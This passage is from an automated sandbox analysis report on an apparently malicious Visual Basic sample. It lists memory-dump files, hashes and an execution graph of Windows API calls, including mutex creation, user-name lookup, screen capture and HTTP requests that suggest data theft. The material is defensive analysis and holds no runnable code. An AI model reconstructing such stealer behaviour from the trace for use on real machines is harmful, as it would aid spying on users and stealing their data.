                  • #644.MSVBVM60(-00000004,00000000,00000004,00000000,00000000,00000000,00000001,00000000,004FA88C,00000001), ref: 004FAB00
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: #644
                  • String ID:
                  • API String ID: 700137900-0
                  • Opcode ID: 1f4c41050390b48f0ff15eeca467d064449abbffe8c5838a70dc4f01f83adcfb
                  • Instruction ID: 13f212d88646129eb27942f08bd3d22bc17234d43ec0fdcaa7d4dbd030c5548e
                  • Opcode Fuzzy Hash: 1f4c41050390b48f0ff15eeca467d064449abbffe8c5838a70dc4f01f83adcfb
                  • Instruction Fuzzy Hash: 8C1154B1900205AFD715FFA5CD06FAE7BBCEB19718F10025AF201B7292D67D9A08C669
                  APIs
                  • __vbaNew2.MSVBVM60(0040C9C4,00503BA8,?,?,?,?,?,?,?,?,00401006), ref: 004FE8C1
                  • __vbaObjSetAddref.MSVBVM60(?,005023C0,?,?,?,?,?,?,?,?,00401006), ref: 004FE8D6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010,?,?,?,?,?,?,?,?,00401006), ref: 004FE8F2
                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401006), ref: 004FE8FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$AddrefCheckFreeHresultNew2
                  • String ID:
                  • API String ID: 1649212984-0
                  • Opcode ID: 81fcb9b75f914e846749a17c2d6ed7b8281b26d2a60e68ca3f040f200ac16b6b
                  • Instruction ID: 56571d18a730aa7d9d2030c789b1182546dbef383d1c58afbb6e1b856ceb0bec
                  • Opcode Fuzzy Hash: 81fcb9b75f914e846749a17c2d6ed7b8281b26d2a60e68ca3f040f200ac16b6b
                  • Instruction Fuzzy Hash: 081173B5940608FFC710EF5ACC86EAEBFB8EF58705F20802AF105B72E1C27855449BA4
                  APIs
                  • #644.MSVBVM60(?), ref: 004FEEB9
                  • #644.MSVBVM60(?,004A7914,00000000,?), ref: 004FEECE
                  • #644.MSVBVM60(?,004A7924,00000000,?,004A7914,00000000,?), ref: 004FEEE3
                  • #644.MSVBVM60(?,004A7904,00000000,?,004A7924,00000000,?,004A7914,00000000,?), ref: 004FEEFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: #644
                  • String ID:
                  • API String ID: 700137900-0
                  • Opcode ID: b270ac067bdccd4c5039093e1d57dedaee63b6f14b21fe68c0aaaca15adb1efa
                  • Instruction ID: 174d3e7d2b5dd1a887ee2e0b90b2af9f90e980db0b8c4893c08a7a3f0c43c921
                  • Opcode Fuzzy Hash: b270ac067bdccd4c5039093e1d57dedaee63b6f14b21fe68c0aaaca15adb1efa
                  • Instruction Fuzzy Hash: 9EF068B11042087AEF113F738C02DBF3B6DEF56798701406BFA046B271C97D891186A8

                  Execution Graph

                  Execution Coverage:5.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:8.3%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:6
                  execution_graph 16975 417216 16976 417225 20 API calls 16975->16976 16977 417329 16975->16977 16976->16977 16978 41a1f8 16979 41a208 16978->16979 16985 404d5c GetModuleHandleA 16978->16985 16987 4186c4 16979->16987 16986 404d8f 16985->16986 16986->16979 16988 4186cc 16987->16988 17255 4034e4 16988->17255 16994 418711 17264 407de0 16994->17264 17000 41873a 17001 418745 CreateMutexA 17000->17001 17002 41875f 17001->17002 17003 41965c 17002->17003 17005 40357c 7 API calls 17002->17005 17004 4034e4 7 API calls 17003->17004 17006 419674 17004->17006 17007 418777 17005->17007 17988 403bf4 17006->17988 17334 416dd4 17007->17334 17013 4034e4 7 API calls 17015 41968f 17013->17015 17017 403bf4 SysFreeString 17015->17017 17016 40357c 7 API calls 17018 4187a5 17016->17018 17019 41969f 17017->17019 17020 406ce8 23 API calls 17018->17020 17992 403508 17019->17992 17022 4187b0 17020->17022 17351 406834 17022->17351 17029 403508 7 API calls 17031 4196ca 17029->17031 17030 4187d4 17033 416dd4 7 API calls 17030->17033 17032 403bdc SysFreeString 17031->17032 17034 4196d5 17032->17034 17035 4187e4 17033->17035 17036 403508 7 API calls 17034->17036 17386 417d84 17035->17386 17038 4196e5 17036->17038 17040 403bdc SysFreeString 17038->17040 17042 4196f0 17040->17042 17041 416dd4 7 API calls 17045 418805 17041->17045 17043 403508 7 API calls 17042->17043 17044 419700 17043->17044 17046 403bdc SysFreeString 17044->17046 17045->17003 17049 41882b 17045->17049 17047 41970b 17046->17047 17048 403508 7 API calls 17047->17048 17050 41971b 17048->17050 17457 4074e8 17049->17457 17052 403bdc SysFreeString 17050->17052 17054 419726 17052->17054 17056 403508 7 API calls 17054->17056 17055 4069a8 7 API calls 17057 418852 17055->17057 17058 419736 17056->17058 17060 4074e8 7 API calls 17057->17060 17059 403bdc SysFreeString 17058->17059 17061 419741 17059->17061 17062 41886b 17060->17062 17063 403508 7 API calls 17061->17063 17467 406b08 17062->17467 17065 419751 17063->17065 17067 403bdc SysFreeString 17065->17067 17069 41975c 17067->17069 17072 403508 7 API calls 17069->17072 17071 4074e8 7 API calls 17073 4188a2 17071->17073 17074 41976c 17072->17074 17075 4069a8 7 API calls 17073->17075 17076 403bdc SysFreeString 17074->17076 17077 4188b3 17075->17077 17078 419777 17076->17078 17489 408180 17077->17489 17080 403508 7 API calls 17078->17080 17082 419787 17080->17082 17084 403bf4 SysFreeString 17082->17084 17085 419797 17084->17085 17086 4034e4 7 API calls 17085->17086 17087 4197a2 17086->17087 17088 403bf4 SysFreeString 17087->17088 17089 4197b2 17088->17089 17090 4034e4 7 API calls 17089->17090 17092 4197bd 17090->17092 17091 418fb5 17898 41698c 17091->17898 17094 403bf4 SysFreeString 17092->17094 17096 4197cd 17094->17096 17098 4034e4 7 API calls 17096->17098 17100 4197d8 17098->17100 17102 403bf4 SysFreeString 17100->17102 17105 4197e8 17102->17105 17109 4034e4 7 API calls 17105->17109 17106 407a18 12 API calls 17121 4188c6 17106->17121 17113 4197f3 17109->17113 17118 403bf4 SysFreeString 17113->17118 17114 40357c 7 API calls 17114->17121 17123 419803 17118->17123 17121->17003 17121->17091 17121->17106 17121->17114 17128 418afd GetSystemMetrics GetSystemMetrics 17121->17128 17133 417d84 51 API calls 17121->17133 17138 40e6d4 8 API calls 17121->17138 17141 413f58 33 API calls 17121->17141 17142 4074e8 7 API calls 17121->17142 17143 407108 9 API calls 17121->17143 17154 403850 7 API calls 17121->17154 17163 4037dc 7 API calls 17121->17163 17169 40717c 8 API calls 17121->17169 17173 4034e4 7 API calls 17121->17173 17661 40e1dc 17121->17661 17682 405424 17121->17682 17686 413bb4 17121->17686 17691 405574 17121->17691 17696 413be8 17121->17696 17699 414de8 17121->17699 17780 405114 17121->17780 17788 414808 17121->17788 17808 414a90 17121->17808 17851 40709c 17121->17851 17857 403cf4 17121->17857 17873 403db4 17121->17873 17879 4078d8 17121->17879 17125 403508 7 API calls 17123->17125 17129 419813 17125->17129 17840 416fb0 17128->17840 17130 4034e4 7 API calls 17129->17130 17134 41981b 17130->17134 17133->17121 17999 404280 17134->17999 17138->17121 17139 41982e 17140 403508 7 API calls 17139->17140 17144 41983b 17140->17144 17141->17121 17142->17121 17143->17121 17146 4034e4 7 API calls 17144->17146 17148 419843 17146->17148 17150 403508 7 API calls 17148->17150 17152 419850 17150->17152 17155 403508 7 API calls 17152->17155 17154->17121 17156 41985d 17155->17156 17245 4033f4 17156->17245 17163->17121 17169->17121 17173->17121 17246 40340d 17245->17246 17247 40342c 17246->17247 17248 40343d 17246->17248 20858 403368 17247->20858 17251 403478 FreeLibrary 17248->17251 17253 40347e 17248->17253 17250 403436 17250->17248 17251->17253 17252 4034b3 17253->17252 17254 4034ab ExitProcess 17253->17254 17256 403505 17255->17256 17257 4034ea 17255->17257 17259 40357c 17256->17259 17257->17256 18024 402550 17257->18024 17261 403580 17259->17261 17260 4035a4 17263 405668 62 API calls 17260->17263 17261->17260 17262 402550 7 API calls 17261->17262 17262->17260 17263->16994 18038 403538 17264->18038 17268 407df9 17269 407e09 17268->17269 17270 403538 7 API calls 17268->17270 17271 407c34 FreeSid 17269->17271 17270->17269 17272 407e13 17271->17272 17273 407e23 17272->17273 17274 403538 7 API calls 17272->17274 17275 407c34 FreeSid 17273->17275 17274->17273 17276 407e2d 17275->17276 17277 407e3d 17276->17277 17278 403538 7 API calls 17276->17278 18047 407d14 17277->18047 17278->17277 17280 407e42 17281 407e52 17280->17281 17282 403538 7 API calls 17280->17282 17283 406ce8 17281->17283 17282->17281 17284 406cf0 17283->17284 17284->17284 17285 406d13 17284->17285 17286 406d25 17284->17286 17287 403538 7 API calls 17285->17287 18062 406f30 17286->18062 17289 406d20 17287->17289 17292 403508 7 API calls 17289->17292 17290 406d2d 18067 406bd8 17290->18067 17293 406e37 17292->17293 17295 403bf4 SysFreeString 17293->17295 17294 406d40 18075 4065f0 GetUserNameW 17294->18075 17296 406e44 17295->17296 17297 403508 7 API calls 17296->17297 17299 406e51 17297->17299 17320 403798 17299->17320 17300 406d53 18081 406634 17300->18081 17302 406d66 18088 40627c 17302->18088 17305 40627c 7 API calls 17306 406d8a 17305->17306 17307 40627c 7 API calls 17306->17307 17308 406d98 17307->17308 17309 40627c 7 API calls 17308->17309 17310 406da6 17309->17310 17311 403850 7 API calls 17310->17311 17312 406dc2 17311->17312 17313 40627c 7 API calls 17312->17313 17314 406dcd 17313->17314 17315 403850 7 API calls 17314->17315 17318 406ddd 17315->17318 17316 406e13 17317 403538 7 API calls 17316->17317 17317->17289 17318->17316 18098 403a78 17318->18098 17321 4037db 17320->17321 17322 40379c 17320->17322 17321->17000 17323 4037a6 17322->17323 17324 403538 17322->17324 17325 4037d0 17323->17325 17326 4037b9 17323->17326 17330 4035a8 7 API calls 17324->17330 17331 40354c 17324->17331 17329 403b1c 7 API calls 17325->17329 17328 403b1c 7 API calls 17326->17328 17327 40357a 17327->17000 17333 4037be 17328->17333 17329->17333 17330->17331 17331->17327 17332 402550 7 API calls 17331->17332 17332->17327 17333->17000 17336 416ded 17334->17336 17335 416e55 17338 4034e4 7 API calls 17335->17338 17336->17335 18159 4039e8 17336->18159 17339 416e6a 17338->17339 17340 4069a8 17339->17340 17341 4069c7 17340->17341 17342 4034e4 7 API calls 17341->17342 17349 4069dd 17342->17349 17343 406a88 17344 403508 7 API calls 17343->17344 17345 406aa2 17344->17345 17346 4034e4 7 API calls 17345->17346 17347 406aaa 17346->17347 17347->17016 17348 4036cc 7 API calls 17348->17349 17349->17343 17349->17348 17350 403798 7 API calls 17349->17350 17350->17349 17352 40684d 17351->17352 17353 4034e4 7 API calls 17352->17353 17361 406862 17353->17361 17354 4068d2 17355 403508 7 API calls 17354->17355 17356 4068ec 17355->17356 17359 4034e4 7 API calls 17356->17359 17358 40680c 7 API calls 17358->17361 17362 4068f4 17359->17362 17360 403798 7 API calls 17360->17361 17361->17354 17361->17358 17361->17360 17363 403850 7 API calls 17361->17363 18165 4036cc 17361->18165 17364 4037dc 17362->17364 17363->17361 17365 4037e0 17364->17365 17371 403798 17364->17371 17366 403538 17365->17366 17368 4037f0 17365->17368 17369 4037fe 17365->17369 17365->17371 17372 4035a8 7 API calls 17366->17372 17376 40354c 17366->17376 17367 40357a 17367->17030 17373 403538 7 API calls 17368->17373 17374 4035a8 7 API calls 17369->17374 17370 4037db 17370->17030 17371->17366 17371->17370 17375 4037a6 17371->17375 17372->17376 17373->17371 17382 403811 17374->17382 17377 4037d0 17375->17377 17378 4037b9 17375->17378 17376->17367 17379 402550 7 API calls 17376->17379 17381 403b1c 7 API calls 17377->17381 17380 403b1c 7 API calls 17378->17380 17379->17367 17384 4037be 17380->17384 17381->17384 17383 403538 7 API calls 17382->17383 17385 40383d 17383->17385 17384->17030 17385->17030 17387 417d8d 17386->17387 17388 417de2 17387->17388 17390 40357c 7 API calls 17387->17390 17389 4034e4 7 API calls 17388->17389 17391 417dea 17389->17391 17390->17388 17392 40357c 7 API calls 17391->17392 17393 417df5 17392->17393 17394 40357c 7 API calls 17393->17394 17395 417e06 17394->17395 17396 4039e8 7 API calls 17395->17396 17397 417e0e GetModuleHandleA 17396->17397 17398 417e2a 17397->17398 17399 417e1a 17397->17399 17401 4039e8 7 API calls 17398->17401 17400 4039e8 7 API calls 17399->17400 17402 417e22 LoadLibraryA 17400->17402 17403 417e32 GetProcAddress 17401->17403 17402->17398 17404 4039e8 7 API calls 17403->17404 17405 417e47 GetProcAddress 17404->17405 17406 4039e8 7 API calls 17405->17406 17407 417e5c GetProcAddress 17406->17407 17408 4039e8 7 API calls 17407->17408 17409 417e71 GetProcAddress 17408->17409 17410 4039e8 7 API calls 17409->17410 17411 417e86 GetProcAddress 17410->17411 17412 4039e8 7 API calls 17411->17412 17413 417e9b GetProcAddress 17412->17413 17414 4039e8 7 API calls 17413->17414 17415 417eb0 GetProcAddress 17414->17415 17416 4039e8 7 API calls 17415->17416 17417 417ec4 GetProcAddress 17416->17417 17418 4039e8 7 API calls 17417->17418 17419 417edb GetProcAddress 17418->17419 17420 417ef7 17419->17420 17421 417fcd InternetCrackUrlA 17420->17421 17422 417fdc 17421->17422 18168 4039f0 17422->18168 17424 417ffd 17425 418052 InternetOpenA 17424->17425 17427 4037dc 7 API calls 17424->17427 17426 41806c InternetConnectA 17425->17426 17433 4181b1 17425->17433 17426->17433 17441 4180af 17426->17441 17428 418036 17427->17428 18239 417668 17428->18239 17431 418044 17431->17425 17432 418203 17435 40627c 7 API calls 17432->17435 17438 418220 17432->17438 17433->17432 18175 417820 17433->18175 17434 403538 7 API calls 17437 418245 17434->17437 17435->17438 17439 4034e4 7 API calls 17437->17439 17438->17434 17440 41824d 17439->17440 17443 403508 7 API calls 17440->17443 17442 4180f7 HttpOpenRequestA 17441->17442 17444 4181ab InternetCloseHandle 17442->17444 17449 41810c 17442->17449 17445 41826a 17443->17445 17444->17433 17446 403508 7 API calls 17445->17446 17447 418277 17446->17447 17448 403508 7 API calls 17447->17448 17450 418284 17448->17450 17452 418141 HttpSendRequestA 17449->17452 17451 403508 7 API calls 17450->17451 17453 418291 17451->17453 17452->17444 17454 418154 17452->17454 17453->17041 17454->17444 17455 4035d4 7 API calls 17454->17455 17456 403798 7 API calls 17454->17456 17455->17454 17456->17454 17458 407504 17457->17458 17459 4034e4 7 API calls 17458->17459 17463 407529 17459->17463 17460 407593 17461 403508 7 API calls 17460->17461 17462 4075ad 17461->17462 17462->17055 17463->17460 17464 4039f0 7 API calls 17463->17464 17465 407571 17464->17465 17465->17460 17466 4039f0 7 API calls 17465->17466 17466->17460 17468 406b24 17467->17468 17469 40357c 7 API calls 17468->17469 17472 406b3f 17469->17472 17470 406b8f 17471 403538 7 API calls 17470->17471 17473 406b9a 17471->17473 17472->17470 17474 4039e8 7 API calls 17472->17474 17475 4034e4 7 API calls 17473->17475 17474->17472 17476 406baf 17475->17476 17477 4034e4 7 API calls 17476->17477 17478 406bb7 17477->17478 17479 407a18 17478->17479 17480 404804 12 API calls 17479->17480 17484 407a3a 17480->17484 17481 407a9b 17482 404804 12 API calls 17481->17482 17485 407ab6 17482->17485 17483 404804 12 API calls 17483->17484 17484->17481 17484->17483 17486 4039f0 7 API calls 17484->17486 17487 4039f0 7 API calls 17485->17487 17486->17484 17488 407adc 17487->17488 17488->17071 17490 408196 17489->17490 17491 407a18 12 API calls 17490->17491 17492 4081b4 17491->17492 17493 403538 7 API calls 17492->17493 17494 4082c3 17493->17494 17495 403538 7 API calls 17494->17495 17496 4082d3 17495->17496 17497 403538 7 API calls 17496->17497 17498 4082e3 17497->17498 17499 403538 7 API calls 17498->17499 17500 4082f3 17499->17500 17501 403538 7 API calls 17500->17501 17502 408303 17501->17502 17503 403538 7 API calls 17502->17503 17504 408313 17503->17504 17505 403538 7 API calls 17504->17505 17506 408323 17505->17506 17507 403538 7 API calls 17506->17507 17508 408333 17507->17508 17509 403538 7 API calls 17508->17509 17510 408353 17509->17510 17511 403538 7 API calls 17510->17511 17512 408363 17511->17512 17513 403538 7 API calls 17512->17513 17514 408373 17513->17514 17515 403538 7 API calls 17514->17515 17516 408383 17515->17516 17517 403538 7 API calls 17516->17517 17518 408393 17517->17518 17519 403538 7 API calls 17518->17519 17520 4088ac 17519->17520 17521 403538 7 API calls 17520->17521 17522 4088bf 17521->17522 17523 403538 7 API calls 17522->17523 17524 4088d2 17523->17524 17525 403538 7 API calls 17524->17525 17526 4088e5 17525->17526 17527 403538 7 API calls 17526->17527 17528 4088f8 17527->17528 17529 403538 7 API calls 17528->17529 17530 408a74 17529->17530 17531 403538 7 API calls 17530->17531 17532 408a87 17531->17532 17533 403538 7 API calls 17532->17533 17534 408a9a 17533->17534 17535 403538 7 API calls 17534->17535 17536 408aad 17535->17536 17537 403538 7 API calls 17536->17537 17538 408b32 17537->17538 17539 403538 7 API calls 17538->17539 17540 408b45 17539->17540 17541 403538 7 API calls 17540->17541 17542 408b58 17541->17542 17543 403538 7 API calls 17542->17543 17544 408b6b 17543->17544 17545 403538 7 API calls 17544->17545 17546 408b7e 17545->17546 17547 403538 7 API calls 17546->17547 17548 408b91 17547->17548 17549 403538 7 API calls 17548->17549 17550 408ba4 17549->17550 17551 403538 7 API calls 17550->17551 17552 408bca 17551->17552 17553 403538 7 API calls 17552->17553 17554 408bdd 17553->17554 17555 403538 7 API calls 17554->17555 17556 408bf0 17555->17556 17557 403538 7 API calls 17556->17557 17558 408c03 17557->17558 17559 403538 7 API calls 17558->17559 17560 408c16 17559->17560 17561 403538 7 API calls 17560->17561 17562 408c29 17561->17562 17563 403538 7 API calls 17562->17563 17564 408c3c 17563->17564 17565 403538 7 API calls 17564->17565 17566 408c4f 17565->17566 17567 403538 7 API calls 17566->17567 17568 408c62 17567->17568 17569 403538 7 API calls 17568->17569 17570 408c75 17569->17570 17571 403538 7 API calls 17570->17571 17572 408c88 17571->17572 17573 403538 7 API calls 17572->17573 17574 408c9b 17573->17574 17575 403538 7 API calls 17574->17575 17576 408cae 17575->17576 17577 403538 7 API calls 17576->17577 17578 408cc1 17577->17578 17579 403538 7 API calls 17578->17579 17580 408cd4 17579->17580 17581 403538 7 API calls 17580->17581 17582 408ce7 17581->17582 17583 403538 7 API calls 17582->17583 17584 408cfa 17583->17584 17585 403538 7 API calls 17584->17585 17586 408d0d 17585->17586 17587 403538 7 API calls 17586->17587 17588 408d20 17587->17588 17589 403538 7 API calls 17588->17589 17590 408d33 17589->17590 17591 403538 7 API calls 17590->17591 17592 408d46 17591->17592 17593 403538 7 API calls 17592->17593 17594 408d59 17593->17594 17595 403538 7 API calls 17594->17595 17596 408d6c 17595->17596 17597 403538 7 API calls 17596->17597 17598 408d7f 17597->17598 17599 403538 7 API calls 17598->17599 17600 408d92 17599->17600 17601 403538 7 API calls 17600->17601 17602 408da5 17601->17602 17603 404810 9 API calls 17602->17603 17604 408de6 17603->17604 17605 4034e4 7 API calls 17604->17605 17606 408dee 17605->17606 17607 409668 17606->17607 17608 40967f 17607->17608 18372 4062fc 17608->18372 17611 403c18 3 API calls 17612 4096b5 17611->17612 17613 4096be CreateDirectoryW 17612->17613 18377 4094e0 17613->18377 17620 4062fc 3 API calls 17621 4096f9 17620->17621 17622 403c18 3 API calls 17621->17622 17623 409703 17622->17623 17624 40970c CreateDirectoryW 17623->17624 17625 4094e0 17 API calls 17624->17625 17626 40971c 17625->17626 17627 403e14 3 API calls 17626->17627 17628 409759 17627->17628 17629 409761 LoadLibraryExW 17628->17629 17630 409772 17629->17630 17660 4098cd 17629->17660 17632 40977e GetProcAddress 17630->17632 17631 403bf4 SysFreeString 17633 40995a 17631->17633 18407 403990 17632->18407 17635 4034e4 7 API calls 17633->17635 17637 409962 17635->17637 17637->17121 17638 403990 17639 4097b2 GetProcAddress 17638->17639 17640 403990 17639->17640 17641 4097cc GetProcAddress 17640->17641 17642 403990 17641->17642 17643 4097e6 GetProcAddress 17642->17643 17644 403990 17643->17644 17645 409800 GetProcAddress 17644->17645 17646 403990 17645->17646 17647 40981a GetProcAddress 17646->17647 17648 403990 17647->17648 17649 409834 GetProcAddress 17648->17649 17650 403990 17649->17650 17651 40984e GetProcAddress 17650->17651 17652 403990 17651->17652 17653 409868 GetProcAddress 17652->17653 17654 403990 17653->17654 17655 409882 GetProcAddress 17654->17655 17656 403990 17655->17656 17657 40989c GetProcAddress 17656->17657 17658 403990 17657->17658 17659 4098b6 GetProcAddress 17658->17659 17659->17660 17660->17631 18425 40a394 17661->18425 17685 405434 17682->17685 17683 405503 17683->17121 17684 403850 7 API calls 17684->17685 17685->17683 17685->17684 19342 410304 17686->19342 17692 4034e4 7 API calls 17691->17692 17693 405580 17692->17693 17694 4055b3 17693->17694 17695 403850 7 API calls 17693->17695 17694->17121 17695->17693 20228 4132f8 17696->20228 17700 414df0 17699->17700 17700->17700 17701 404150 SysAllocStringLen 17700->17701 17702 414e05 17701->17702 17703 4062fc 3 API calls 17702->17703 17704 414e2c 17703->17704 17705 403e14 3 API calls 17704->17705 17712 414e40 17705->17712 17706 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 17706->17712 17707 40776c SysFreeString SysAllocStringLen 17707->17712 17708 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 17708->17712 17709 40e79c 16 API calls 17709->17712 17710 415119 17711 4075c0 6 API calls 17710->17711 17714 41513d 17711->17714 17712->17706 17712->17707 17712->17708 17712->17709 17712->17710 17713 415279 17715 4075c0 6 API calls 17713->17715 17714->17713 17716 40776c 2 API calls 17714->17716 17719 415295 17715->17719 17717 415156 17716->17717 17717->17713 20542 4077c8 17717->20542 17720 4152f8 17719->17720 17722 40776c 2 API calls 17719->17722 17726 403bf4 SysFreeString 17720->17726 17724 4152aa 17722->17724 17723 403e78 3 API calls 17725 41518a 17723->17725 17724->17720 17729 403e14 3 API calls 17724->17729 20551 40e79c 17725->20551 17727 415317 17726->17727 17728 4034e4 7 API calls 17727->17728 17730 415322 17728->17730 17731 4152c1 17729->17731 17733 403bf4 SysFreeString 17730->17733 17738 403e14 3 API calls 17731->17738 17735 415332 17733->17735 17737 4034e4 7 API calls 17735->17737 17736 4077c8 6 API calls 17739 4151bf 17736->17739 17740 41533d 17737->17740 17741 4152ec 17738->17741 17742 403e78 3 API calls 17739->17742 17745 403bf4 SysFreeString 17740->17745 17743 40e79c 16 API calls 17741->17743 17744 4151da 17742->17744 17743->17720 17748 403e14 3 API calls 17744->17748 17746 41534d 17745->17746 17747 4034e4 7 API calls 17746->17747 17749 415358 17747->17749 17750 415205 17748->17750 17751 403bf4 SysFreeString 17749->17751 17752 40e79c 16 API calls 17750->17752 17753 415368 17751->17753 17754 415211 17752->17754 17755 4034e4 7 API calls 17753->17755 17756 4077c8 6 API calls 17754->17756 17757 415373 17755->17757 17758 415227 17756->17758 17759 403bf4 SysFreeString 17757->17759 17760 403e78 3 API calls 17758->17760 17761 415383 17759->17761 17763 415242 17760->17763 17762 4034e4 7 API calls 17761->17762 17764 41538e 17762->17764 17767 403e14 3 API calls 17763->17767 17765 403bf4 SysFreeString 17764->17765 17766 41539e 17765->17766 17768 4034e4 7 API calls 17766->17768 17769 41526d 17767->17769 17770 4153a9 17768->17770 17771 40e79c 16 API calls 17769->17771 17772 403bf4 SysFreeString 17770->17772 17771->17713 17773 4153b9 17772->17773 17774 4034e4 7 API calls 17773->17774 17775 4153c4 17774->17775 17776 403bf4 SysFreeString 17775->17776 17777 4153d4 17776->17777 17778 403bf4 SysFreeString 17777->17778 17779 4153e1 17778->17779 17779->17121 17781 40512a 17780->17781 20576 405088 17781->20576 17784 403850 7 API calls 17785 405160 17784->17785 17786 403508 7 API calls 17785->17786 17787 40517a 17786->17787 17787->17121 17789 404150 SysAllocStringLen 17788->17789 17790 414853 17789->17790 17791 4062fc 3 API calls 17790->17791 17792 414874 17791->17792 17793 403e14 3 API calls 17792->17793 17794 414888 17793->17794 17795 40776c 2 API calls 17794->17795 17796 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 17794->17796 17797 414995 17794->17797 17801 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 17794->17801 17804 40e79c 16 API calls 17794->17804 17795->17794 17796->17794 17798 403bf4 SysFreeString 17797->17798 17799 4149bc 17798->17799 17800 4034e4 7 API calls 17799->17800 17802 4149c7 17800->17802 17801->17794 17803 403bf4 SysFreeString 17802->17803 17805 4149d7 17803->17805 17804->17794 17806 403bf4 SysFreeString 17805->17806 17807 4149e4 17806->17807 17807->17121 17809 414a98 17808->17809 17809->17809 17810 404150 SysAllocStringLen 17809->17810 17811 414aae 17810->17811 17812 4075c0 6 API calls 17811->17812 17813 414ae2 17812->17813 20584 40717c 17813->20584 17815 414afb 17816 403e14 3 API calls 17815->17816 17819 414b1d 17816->17819 17817 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 17817->17819 17818 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 17818->17819 17819->17817 17819->17818 17820 40e79c 16 API calls 17819->17820 17821 414bc8 17819->17821 17820->17819 17822 403e14 3 API calls 17821->17822 17825 414be6 17822->17825 17823 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 17823->17825 17824 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 17824->17825 17825->17823 17825->17824 17826 40e79c 16 API calls 17825->17826 17827 414c91 17825->17827 17826->17825 17828 403bf4 SysFreeString 17827->17828 17829 414cb8 17828->17829 17830 4034e4 7 API calls 17829->17830 17831 414cc3 17830->17831 17832 403bf4 SysFreeString 17831->17832 17833 414cd3 17832->17833 17834 4034e4 7 API calls 17833->17834 17835 414cde 17834->17835 17836 403bf4 SysFreeString 17835->17836 17837 414cee 17836->17837 17838 403bf4 SysFreeString 17837->17838 17839 414cfb 17838->17839 17839->17121 17841 4171c1 17840->17841 17842 416fe5 17840->17842 17841->17121 17842->17841 17843 41708e GetDC CreateCompatibleDC CreateCompatibleBitmap SelectObject BitBlt 17842->17843 17844 4170df 17843->17844 20604 416edc 17844->20604 17848 4035d4 7 API calls 17849 417190 GlobalUnWire DeleteObject DeleteDC ReleaseDC 17848->17849 17849->17841 17852 4070cb 17851->17852 17853 403c18 3 API calls 17852->17853 17854 4070e3 17853->17854 17855 403bdc SysFreeString 17854->17855 17856 4070f8 17855->17856 17856->17121 17864 403c44 17857->17864 17858 403c66 17860 403c99 17858->17860 20610 403624 MultiByteToWideChar 17858->20610 17859 403c5d 17861 403bdc SysFreeString 17859->17861 17862 40410c 3 API calls 17860->17862 17871 403c64 17861->17871 17865 403ca4 17862->17865 17864->17858 17864->17859 20611 403624 MultiByteToWideChar 17865->20611 17866 403c84 17866->17860 17868 403c8a 17866->17868 17870 403cd0 4 API calls 17868->17870 17869 403cb2 17869->17871 17872 40410c 3 API calls 17869->17872 17870->17871 17871->17121 17872->17871 17875 403dc5 17873->17875 17874 403e0d 17874->17121 17875->17874 17876 